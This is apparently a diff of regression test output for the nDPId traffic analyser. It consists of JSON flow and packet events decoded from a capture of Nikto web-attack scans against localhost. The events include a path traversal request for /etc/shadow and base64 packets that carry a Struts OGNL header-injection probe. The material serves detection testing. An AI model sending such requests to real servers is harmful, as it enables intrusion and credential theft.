+01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:dishwasher)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1576420277474,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"thread_ts_msec":1576420277474,"pkt":"AAAAAAAAAAAAAAAACABFAAFN5cZAAEAGVeJ\/AAABfwAAAcWEH5A2eN0dBhBSM4AYAED\/QQAAAQEICp1m\/gqdZv4KR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiAleyNjb250ZXh0Wydjb20ub3BlbnN5bXBob255Lnh3b3JrMi5kaXNwYXRjaGVyLkh0dHBTZXJ2bGV0UmVzcG9uc2UnXS5hZGRIZWFkZXIoJ05pa3RvLUFkZGVkLUNWRS0yMDE3LTU2MzgnLDcqNil9Lm11bHRpcGFydC9mb3JtLWRhdGENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzdHJ1dHNob2NrKQ0KDQo="} -01042{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} 
+01042{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1576420277477,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1576420277477,"pkt":"AAAAAAAAAAAAAAAACABFAAFZtP1AAEAGhp9\/AAABfwAAAcWGH5CUg4wjlAViUYAYAED\/TQAAAQEICp1m\/g2dZv4NR0VUIC9pbmRleC5hY3Rpb24gSFRUUC8xLjENCkNvbnRlbnQtVHlwZTogJXsjY29udGV4dFsnY29tLm9wZW5zeW1waG9ueS54d29yazIuZGlzcGF0Y2hlci5IdHRwU2VydmxldFJlc3BvbnNlJ10uYWRkSGVhZGVyKCdOaWt0by1BZGRlZC1DVkUtMjAxNy01NjM4Jyw3KjYpfS5tdWx0aXBhcnQvZm9ybS1kYXRhDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c3RydXRzaG9jaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1576420277478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1576420277478,"pkt":"AAAAAAAAAAAAAAAACABFAAFZjkpAAEAGrVJ\/AAABfwAAAcWIH5BLo7aS1iADwIAYAED\/TQAAAQEICp1m\/g6dZv4OR0VUIC9sb2dpbi5hY3Rpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnN0cnV0c2hvY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6ICV7I2NvbnRleHRbJ2NvbS5vcGVuc3ltcGhvbnkueHdvcmsyLmRpc3BhdGNoZXIuSHR0cFNlcnZsZXRSZXNwb25zZSddLmFkZEhlYWRlcignTmlrdG8tQWRkZWQtQ1ZFLTIwMTctNTYzOCcsNyo2KX0ubXVsdGlwYXJ0L2Zvcm0tZGF0YQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1576420277480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"thread_ts_msec":1576420277480,"pkt":"AAAAAAAAAAAAAAAACABFAAC6N0ZAAEAGBPZ\/AAABfwAAAcWKH5D5Xg+fNMDiFYAYAED+rgAAAQEICp1m\/hCdZv4QR0VUIC92Mi9fY2F0YWxvZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/v2\/_catalog","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:)"}} 
+01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/v2\/_catalog","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1576420277488,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277488,"pkt":"AAAAAAAAAAAAAAAACABFAADHoFdAAEAGm9d\/AAABfwAAAcWMH5DDZpiKMo58\/IAYAED+uwAAAQEICp1m\/hidZv4YR0VUIC9jZmFwcG1hbi9pbmRleC5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxMykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfappman\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000013)"}} 
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfappman\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000013)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1576420277490,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277490,"pkt":"AAAAAAAAAAAAAAAACABFAADZlJRAAEAGp4h\/AAABfwAAAcWOH5DTxKxPH2zSx4AYAED+zQAAAQEICp1m\/hqdZv4aR0VUIC9jZmRvY3MvZXhhbXBsZXMvY3ZiZWFucy9iZWFuaW5mby5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNCkNCg0K"} -01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/cvbeans\/beaninfo.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000014)"}} 
+01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/cvbeans\/beaninfo.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000014)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1576420277491,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277491,"pkt":"AAAAAAAAAAAAAAAACABFAADVNLZAAEAGB2t\/AAABfwAAAcWQH5BQIAxp\/aIKGoAYAED+yQAAAQEICp1m\/hudZv4bR0VUIC9jZmRvY3MvZXhhbXBsZXMvcGFya3MvZGV0YWlsLmNmbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/parks\/detail.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000015)"}} 
+01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/parks\/detail.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000015)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
